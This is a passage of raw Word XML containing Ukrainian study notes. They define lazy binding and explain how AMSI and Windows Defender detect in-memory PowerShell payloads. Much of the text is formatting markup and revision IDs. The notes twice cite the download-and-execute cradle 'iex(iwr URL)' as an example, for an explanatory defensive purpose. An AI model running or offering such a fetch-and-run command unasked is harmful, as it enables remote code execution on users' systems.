        <w:t>time</w:t>
      </w:r>
      <w:r w:rsidR="003C5C26">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00554217">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE990F5" w14:textId="1B7FC691" w:rsidR="003C5C26" w:rsidRPr="00E7475D" w:rsidRDefault="00A010E1" w:rsidP="007D75D9">
      <w:pPr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>Lazy</w:t>
      </w:r>
      <w:r w:rsidRPr="002D65C4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>binding</w:t>
      </w:r>
      <w:r w:rsidRPr="002D65C4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00472E47" w:rsidRPr="002D65C4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="002D65C4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00472E47">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>це</w:t>
      </w:r>
      <w:r w:rsidR="00472E47" w:rsidRPr="002D65C4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00472E47">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>метод зв'язування, при якому адрес</w:t>
      </w:r>
      <w:r w:rsidR="002D65C4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>а кожної</w:t>
      </w:r>
      <w:r w:rsidR="00472E47">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> функці</w:t>
      </w:r>
      <w:r w:rsidR="002D65C4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ї</w:t>
      </w:r>
      <w:r w:rsidR="00472E47">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> розраховуються в момент </w:t>
      </w:r>
      <w:r w:rsidR="005B4F52">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">першого </w:t>
      </w:r>
      <w:r w:rsidR="002D65C4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">виклику </w:t>
      </w:r>
      <w:r w:rsidR="005B4F52">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">цієї </w:t>
      </w:r>
      <w:r w:rsidR="002D65C4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>фун</w:t>
      </w:r>
      <w:r w:rsidR="005B4F52">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>кції</w:t>
      </w:r>
      <w:r w:rsidR="00472E47">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (в </w:t>
      </w:r>
      <w:r w:rsidR="005B4F52">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="005B4F52" w:rsidRPr="005B4F52">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00472E47">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r w:rsidR="00472E47">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00DA47EA" w:rsidRPr="00DA47EA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AA2250" w14:textId="77777777" w:rsidR="009A143F" w:rsidRDefault="009A143F" w:rsidP="007D75D9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16A11ADE" w14:textId="77777777" w:rsidR="009A143F" w:rsidRPr="00B51685" w:rsidRDefault="009A143F" w:rsidP="007D75D9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56181861" w14:textId="20D72DC0" w:rsidR="00FC345E" w:rsidRDefault="007D75D9" w:rsidP="004E3968">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0D21">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>Як</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0D21">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>дбувається</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0D21">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>детектування</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0D21">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0D21">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>навантаження</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0D21">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0D21">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>пам</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0D21">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>ят</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0D21">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidR="004967E2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>приклад</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0D21">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iex</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0D21">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iwr</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0D21">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0D21">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">))? </w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t xml:space="preserve">Що таке </w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AMSI</w:t>
      </w:r>
      <w:r w:rsidRPr="007D75D9">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D865A52" w14:textId="0B7057C6" w:rsidR="00B16E5F" w:rsidRDefault="00261951" w:rsidP="006552BC">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AMSI (</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>Антивірусний</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>сканер</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>інтерфейсу</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft) - </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>це</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>інтерфейс</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>який</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>дозволяє</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>антивірусним</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>програмам</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>сканувати</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>скрипти</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>та</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>інші</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>типи</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>коду</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>наявність</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>шкідливого</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>вмісту</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>перед</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>їх</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:t>виконанням</w:t>
      </w:r>
      <w:r w:rsidRPr="00261951">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CE46E6" w14:textId="68834D99" w:rsidR="00C97603" w:rsidRPr="0008253C" w:rsidRDefault="00C97603" w:rsidP="006552BC">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0008253C">
        <w:t xml:space="preserve">Детектування </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97603">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="0008253C">
        <w:t xml:space="preserve"> навантаження в пам'яті</w:t>
      </w:r>
      <w:r w:rsidR="0008253C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0008253C">
        <w:t>відбувається таким чином:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E82B80D" w14:textId="447AF047" w:rsidR="00C97603" w:rsidRPr="00C97603" w:rsidRDefault="004C0DD4" w:rsidP="00C97603">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r w:rsidR="001C1DEC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>При</w:t>
      </w:r>
      <w:r w:rsidR="00AF76B0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> виконанні </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>команд</w:t>
      </w:r>
      <w:r w:rsidR="001C1DEC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iex(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iwr URL), PowerShell завантажує вміст з вказаного URL у пам'ять.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DBA40A" w14:textId="54AB8DE2" w:rsidR="00C97603" w:rsidRPr="00FF256A" w:rsidRDefault="00000526" w:rsidP="00C97603">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r w:rsidR="00DB14AB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Перш ніж виконувати цей код,</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell викликає AMSI для</w:t>
      </w:r>
      <w:r w:rsidR="006570D9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> його</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F79A2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>перевірки</w:t>
      </w:r>
      <w:r w:rsidR="00FF256A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A2CB4" w14:textId="268533C0" w:rsidR="00C97603" w:rsidRPr="00CD0219" w:rsidRDefault="001021B7" w:rsidP="00C97603">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AMSI</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00FF256A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> використовує </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00FF256A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defender</w:t>
      </w:r>
      <w:r w:rsidR="00551EA0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00FF256A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">для сканування </w:t>
      </w:r>
      <w:r w:rsidR="0012061B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ко</w:t>
      </w:r>
      <w:r w:rsidR="00287101">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ду</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00FF256A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:t>Якщо</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00CD0219">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:t>антивірус</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00CD0219">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:t>виявить</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00CD0219">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:t>щось</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00CD0219">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:t>підозріле</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00CD0219">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:t>або</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00CD0219">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:t>шкідливе</w:t>
      </w:r>
      <w:r w:rsidR="00CD0219">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, то </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00CD0219">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ін</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00CD0219">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:t>повідомить</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00CD0219">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AMSI</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00CD0219">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A1C0FE" w14:textId="6C178A3A" w:rsidR="00C97603" w:rsidRPr="00C97603" w:rsidRDefault="00551EA0" w:rsidP="00C97603">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">4) </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AMSI</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:t xml:space="preserve">, в свою чергу, інформує </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:t xml:space="preserve"> про виявлену загрозу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F28ECE" w14:textId="4986D2A5" w:rsidR="00C97603" w:rsidRPr="00CD0219" w:rsidRDefault="006378B2" w:rsidP="00C97603">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">5) </w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidR="00C97603" w:rsidRPr="00C97603">
        <w:t xml:space="preserve"> може заблокувати виконання завантаженого коду</w:t>
      </w:r>
      <w:r w:rsidR="00CD0219">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C97603" w:rsidRPr="00CD0219" w:rsidSect="00927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526"/>
    <w:rsid w:val="000013D1"/>
    <w:rsid w:val="000018C0"/>
    <w:rsid w:val="00001E9D"/>
    <w:rsid w:val="000022F7"/>
    <w:rsid w:val="00002494"/>
    <w:rsid w:val="00002CB1"/>
    <w:rsid w:val="00002E91"/>
    <w:rsid w:val="000032EE"/>
    <w:rsid w:val="0000337D"/>
    <w:rsid w:val="00003CFA"/>
    <w:rsid w:val="00004392"/>
    <w:rsid w:val="000047C4"/>
    <w:rsid w:val="0000489E"/>
    <w:rsid w:val="00004B8A"/>
    <w:rsid w:val="00004E37"/>
    <w:rsid w:val="0000529E"/>
    <w:rsid w:val="0000530E"/>
    <w:rsid w:val="0000541C"/>
    <w:rsid w:val="00005799"/>
    <w:rsid w:val="00005A52"/>
    <w:rsid w:val="00005C6A"/>
    <w:rsid w:val="00006B2D"/>
    <w:rsid w:val="0000758C"/>
    <w:rsid w:val="000077B9"/>
    <w:rsid w:val="00007ABE"/>
    <w:rsid w:val="00007C3A"/>
    <w:rsid w:val="00010176"/>
    <w:rsid w:val="00010544"/>
    <w:rsid w:val="00010584"/>
    <w:rsid w:val="000106FD"/>
    <w:rsid w:val="000107AD"/>
    <w:rsid w:val="00011038"/>
    <w:rsid w:val="000112AE"/>
    <w:rsid w:val="00011316"/>
    <w:rsid w:val="000114F8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0FF"/>
    <w:rsid w:val="00016482"/>
    <w:rsid w:val="000169DE"/>
    <w:rsid w:val="00016B61"/>
    <w:rsid w:val="000177DA"/>
    <w:rsid w:val="000178D7"/>
    <w:rsid w:val="00017944"/>
    <w:rsid w:val="000179EB"/>
    <w:rsid w:val="00017EB8"/>
    <w:rsid w:val="000205E4"/>
    <w:rsid w:val="00020654"/>
    <w:rsid w:val="00020E9D"/>
    <w:rsid w:val="0002198F"/>
    <w:rsid w:val="00021B15"/>
    <w:rsid w:val="000223D1"/>
    <w:rsid w:val="000226B6"/>
    <w:rsid w:val="0002274E"/>
    <w:rsid w:val="000229B7"/>
    <w:rsid w:val="00023EBE"/>
    <w:rsid w:val="000241A1"/>
    <w:rsid w:val="00024338"/>
    <w:rsid w:val="00025140"/>
    <w:rsid w:val="00025D53"/>
    <w:rsid w:val="00025EC9"/>
    <w:rsid w:val="0002621B"/>
    <w:rsid w:val="000263DE"/>
    <w:rsid w:val="000264D1"/>
    <w:rsid w:val="000272B3"/>
    <w:rsid w:val="000275D2"/>
    <w:rsid w:val="00027943"/>
    <w:rsid w:val="000313A2"/>
    <w:rsid w:val="000314A5"/>
    <w:rsid w:val="000314A9"/>
    <w:rsid w:val="0003181C"/>
    <w:rsid w:val="00031ACE"/>
